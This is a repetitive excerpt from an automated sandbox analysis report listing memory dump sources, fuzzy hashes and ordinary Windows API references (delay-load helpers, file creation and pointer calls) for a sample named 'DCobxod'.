                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 92bc9a48e89cd673b2e307aae3e589d9f64a8bdbf6dce4fc42827d084639d846
                                                              • Instruction ID: 4ba4dbe0cecba4d515234a45fd6af0c925da8e81eab669f6229afdade31c1866
                                                              • Opcode Fuzzy Hash: 92bc9a48e89cd673b2e307aae3e589d9f64a8bdbf6dce4fc42827d084639d846
                                                              • Instruction Fuzzy Hash: 88B09291359020AC314466072802D3A021CC082B123B0C03FF849C1180A858A805143A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 82b598e6d3e28a5d17eb32d45e3f2fcce209e68ae9568b4763c0260a915364e8
                                                              • Instruction ID: 76858981652fcced0561ea5c125396b945fdb0431505eb261254420f00890c82
                                                              • Opcode Fuzzy Hash: 82b598e6d3e28a5d17eb32d45e3f2fcce209e68ae9568b4763c0260a915364e8
                                                              • Instruction Fuzzy Hash: 72B0929135A060AC314462072802D3A021DC082B123B0C03FF889C1080A858A801143A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 0de4a16090c4a2f4325d7032e9a11e8799bae77e40166ede34ba3282501c28d2
                                                              • Instruction ID: 51c8dfaa2657a90bd7edf143928f5f1fcbfc242f0e5d993f01b61e7a7dd8d189
                                                              • Opcode Fuzzy Hash: 0de4a16090c4a2f4325d7032e9a11e8799bae77e40166ede34ba3282501c28d2
                                                              • Instruction Fuzzy Hash: 65B012C13690507C310421673C06D3B010CD0C2F1D3B1C03FF454C5481B84C0D45143F
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: d0b3d2752d3b0a1ac9d08aaa2cd04f2b7a88451309b74e87dd62143770d3e5f2
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: d0b3d2752d3b0a1ac9d08aaa2cd04f2b7a88451309b74e87dd62143770d3e5f2
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 1521268a710010fdb1e2a0a5ae184c0b5d483cb5423ff1ce0f6dbc4e3f474315
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 1521268a710010fdb1e2a0a5ae184c0b5d483cb5423ff1ce0f6dbc4e3f474315
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: b63f8cefae43345fe61fedb41e0c8b720d8ae4f25c716f59ff12a200debbe529
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: b63f8cefae43345fe61fedb41e0c8b720d8ae4f25c716f59ff12a200debbe529
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 96c9bbcc0cebe2a7ebf9c13628d2b3e1f6b997e1ddaca54e42aa493118ff0196
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 96c9bbcc0cebe2a7ebf9c13628d2b3e1f6b997e1ddaca54e42aa493118ff0196
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: c5251c1625270233d7ddb58a36a230e4fbf527cee46273451d23444079dc7a56
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: c5251c1625270233d7ddb58a36a230e4fbf527cee46273451d23444079dc7a56
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 65e223489a643bb5567618ba5091bfe6f5872aab368d50686cbeea36aa9ab6b1
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 65e223489a643bb5567618ba5091bfe6f5872aab368d50686cbeea36aa9ab6b1
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 6a234aa8741994fc2dba18073a8a754bb7bb023ae25dfd26a113e49f76455073
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 6a234aa8741994fc2dba18073a8a754bb7bb023ae25dfd26a113e49f76455073
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 77695996551353eff5685450c2cd594d2469ede69048eac8161e77a0689f7ac5
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 77695996551353eff5685450c2cd594d2469ede69048eac8161e77a0689f7ac5
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              APIs
                                                                • Part of subcall function 0043B7BB: GetOEMCP.KERNEL32(00000000,?,?,0043BA44,?), ref: 0043B7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0043BA89,?,00000000), ref: 0043BC64
                                                              • GetCPInfo.KERNEL32(00000000,0043BA89,?,?,?,0043BA89,?,00000000), ref: 0043BC77
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00419A50,?,?,00000000,?,?,00418CBC,?), ref: 00419BAB
                                                              • GetLastError.KERNEL32(?,00000000,00418411,-00009570,00000000,000007F3), ref: 00419BB6
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00411E55
                                                                • Part of subcall function 00413BBA: __EH_prolog.LIBCMT ref: 00413BBF
                                                              • _wcslen.LIBCMT ref: 00411EFD
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004173BC,?,?,?,00000000), ref: 00419DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00419E70
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00419F27,?,?,0041771A), ref: 004196E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00419F27,?,?,0041771A), ref: 00419716
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 2ae5d13f71d8f63e0aba9d10bc542a416b36700646141b5e2c8510e94305e289
                                                              • Instruction ID: cd8b7453f5fea4e12ff3bc92d8d675c7fc16f1ca295aa384ed6bb6a5da89a092
                                                              • Opcode Fuzzy Hash: 2ae5d13f71d8f63e0aba9d10bc542a416b36700646141b5e2c8510e94305e289
                                                              • Instruction Fuzzy Hash: BC21BD71504344AFE3308A65CC89BE7B7DCEB59324F500A2AFAD5C26D1C778AC848676
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00419EC7
                                                              • GetLastError.KERNEL32 ref: 00419ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 0ef33a487d986d0d887d64cb8dae1f84cbfad94dc8ca66f4701520b821c6ea68
                                                              • Instruction ID: 74eb0cff3765549d34a3df2d722342934d9b5dc71d20ae540b19e43ebac67fc0
                                                              • Opcode Fuzzy Hash: 0ef33a487d986d0d887d64cb8dae1f84cbfad94dc8ca66f4701520b821c6ea68
                                                              • Instruction Fuzzy Hash: 2E11E930600700ABD724CB24C850BE7B7E9AB45361F50462BE553D26D0D778EDCAC768
                                                              APIs
                                                              • _free.LIBCMT ref: 00438E75
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
